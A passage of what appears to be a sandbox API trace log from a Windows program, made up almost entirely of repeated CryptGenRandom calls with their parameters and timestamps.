pbBuffer=0x2d7e150) returned 1 [0160.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | 